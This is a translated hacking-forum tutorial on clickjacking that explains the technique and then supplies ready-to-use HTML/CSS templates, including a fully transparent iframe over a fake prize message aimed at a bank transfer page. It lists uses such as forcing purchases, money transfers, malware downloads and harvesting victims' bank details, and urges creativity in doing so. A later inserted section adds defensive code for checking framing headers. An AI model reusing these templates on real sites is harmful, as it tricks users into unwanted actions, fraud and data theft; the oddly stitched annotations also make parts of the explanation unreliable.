Hello, I want to show you what a "clickjacking attack" is and how it is done. First of all, what is clickjacking? Clickjacking is tricking a visitor of a malicious page into clicking a specially placed element (for example on "free download" or "crack download" sites, etc.) so that the click actually lands on content from another site that is hidden underneath it.
To give a very simple example, Facebook clickjacking is done as follows:
A visitor is lured to the malicious page; how does not matter. The page contains a seemingly harmless link (like "get rich now" or "click here for a free download", etc.).
The malicious page positions a hidden <iframe> whose src points to facebook.com over this link, such that the "Like" button sits exactly on top of the link. This is usually done with z-index. The visitor clicks the button while trying to click the link and thus performs the action the attacker wanted on Facebook.
ClickJacking Attack Examples
The attacker creates an invisible iframe on the page and loads the target page into it. The malicious page contains a visual element that entices the user to click, for example a graphic resembling a video player with a play button in the middle. The user clicks the play symbol, but because of the overlay the click actually lands on a link or control of the target page.
The attacker creates a 1 × 1 pixel iframe that moves with the mouse cursor. Due to its size and position this frame is completely invisible (hidden under the tip of the cursor). Wherever the user clicks, the click lands on whatever is loaded and positioned in this 1x1 frame.
The attacker uses only parts of the target page by clipping it, for example an iframe showing just the Submit button of the target page.
An attacker can exploit clickjacking vulnerabilities for many different purposes:
⇝Getting followers on social media and then possibly selling the social media account / page for mass marketing.
⇝Earning email or RSS subscribers for the same purpose as social media followers.
⇝Making a user who is logged into their e-commerce account purchase products on behalf of the attacker.
⇝Making the user unknowingly transfer money to the attacker.
⇝Making the user download malware (e.g. a trojan, worm, backdoor, etc.).
In general, clickjacking is used only for attacks.
Some browsers allow drag and drop into the framed website, making it possible to send text via clickjacking. This means clickjacking can be more effective than CSRF: it becomes possible to exploit XSS vulnerabilities on their own or to submit arbitrary content as the target user, for example adding a new admin user if the victim is deceived.
For these reasons you have to be quite crafty to pull off the attack. A single click from the victim is not enough for more elaborate attacks; sometimes it takes several clicks or a drag and drop within the site.
How to Do a ClickJacking Attack? Examples
Now I will show you the simple clickjacking attack code I prepared. This way you will understand it better.
Code:
<style>
#protector {
  height: 100%;
  width: 100%;
  position: absolute;
  left: 0;
  top: 0;
  z-index: 99999999; /* keep the overlay above everything else on the page */
}
</style>
<div id="protector">
<a href="https://www.turkhackteam.org" target="_blank">Tıkla Kazan Dostum- Slyfer THT</a>
</div>
<script>
// there will be an error if top window is from the different origin
// but that's ok here
// (the forum masked the word "document" with asterisks in the original; restored here)
if (top.document.domain == document.domain) {
  // not framed, or framed by the same origin: the overlay is not needed
  protector.remove();
}
</script>
https://jsfiddle.net/p2heuqc0/
It is very simple code. When the link is clicked, it opens the Turk Hack Team site in a new tab. To change the site, just change href="https://www.turkhackteam.org". Note that this structure is also the classic frame-busting "protector" pattern: the full-page overlay is removed only when the page is not framed by another origin, so inside a hostile frame every click is caught by the overlay instead of reaching the page.
Code:
<!-- decoy text and image that the victim is meant to look at -->
<div style="position: absolute; left: 10px; top: 10px;">Merhaba, çok şanslısın bizden çatal bıçak takımı kazandın :) Turk Hack Team-Slyfer</div>
<div style="position: absolute; left: 200px; top: 50px;">
<img src="https://www.linkpicture.com/q/LPic5f5a31535df0f1455795954.jpg" width="250">
</div>
<div style="position: absolute; left: 10px; top: 101px; color: red; font-weight: bold;">>> Tıkla :) <<</div>
<!-- fully transparent frame laid over the decoy; the src is a placeholder in the original -->
<iframe style="opacity: 0;" height="545" width="680" scrolling="no" src="http://banka hesabı veya link örnektir/Transfer.aspx"></iframe>
https://jsfiddle.net/p2heuqc0/1/
Code:
<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:-20px;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1; /* frame sits above the button, so the click goes to the frame */
}
</style>
<div>Click to get rich now:</div>
<!-- The url from the victim site -->
<iframe src="/clickjacking/facebook.html"></iframe>
<button>Click here!</button>
<div>TURK HACK TEAM</div>
This code is an excerpt.
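The defence against all three layouts above is the same: the target site must refuse to be framed. The following is an added example, not code from the original post, that models how a browser decides from the response headers whether a page may be framed by a given origin; the header names, origins and sample values are constructed for illustration, and a host-source without a scheme is treated as matching any scheme (a simplification of the CSP rules).

```javascript
// Added example, not from the original post: does a response's headers let the
// page be framed by a given origin? That is the condition clickjacking relies on.
// Assumes lower-case header names, origins as "scheme://host[:port]", and that a
// host-source without a scheme matches any scheme (a simplification of CSP).
function parseFrameAncestors(cspValue) {
  // Return the frame-ancestors source list, or null if the directive is absent.
  for (const directive of cspValue.split(";")) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === "frame-ancestors") return tokens.slice(1);
  }
  return null;
}
function originMatchesSource(source, origin, pageOrigin) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return origin === pageOrigin;
  if (src === "*") return true;
  const o = new URL(origin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return o.protocol === src; // e.g. https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && o.protocol !== scheme + ":") return false;
  const hostOk = wildcard ? o.hostname.endsWith("." + host) : o.hostname === host;
  const originPort = o.port || (o.protocol === "https:" ? "443" : "80");
  return hostOk && (!port || port === "*" || port === originPort);
}
function isFramingAllowed(headers, pageOrigin, framerOrigin) {
  // Browsers honour CSP frame-ancestors over X-Frame-Options when both are present.
  const csp = headers["content-security-policy"];
  const ancestors = csp ? parseFrameAncestors(csp) : null;
  if (ancestors) return ancestors.some((s) => originMatchesSource(s, framerOrigin, pageOrigin));
  const xfo = (headers["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framerOrigin === pageOrigin;
  return true; // no (or unrecognised) protection: any site can frame the page
}
// Constructed sample: a bank transfer page served without and with protection.
const bank = "https://bank.example";
const attacker = "https://attacker.example";
const weakHeaders = { "content-type": "text/html" };
const fixedHeaders = {
  "x-frame-options": "DENY", // fallback for browsers without CSP support
  "content-security-policy": "frame-ancestors 'self' https://*.partner.example",
};
console.log("weak:", isFramingAllowed(weakHeaders, bank, attacker)); // true
console.log("fixed:", isFramingAllowed(fixedHeaders, bank, attacker)); // false
```

Running it prints true for the unprotected response and false for the protected one; the same function can be pointed at captured headers of a real site to check whether it would be frameable at all.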
Finally
Clickjacking is a type of attack limited only by your imagination and coding knowledge. If you want, you can do things like clicking ads for a more legal purpose. Or you can prepare a trap around the victim's log records, bank account username, IP address, location information or browser information, whatever your imagination can come up with. That is all I had to say. Thank you for reading.
This was written purely for informational purposes and with no other motive. I wish you good forums..
source: https://www.turkhackteam.org/web-se...ickjacking-saldirisi-nedir-nasil-yapilir.html
translation/translator: Captainyarimca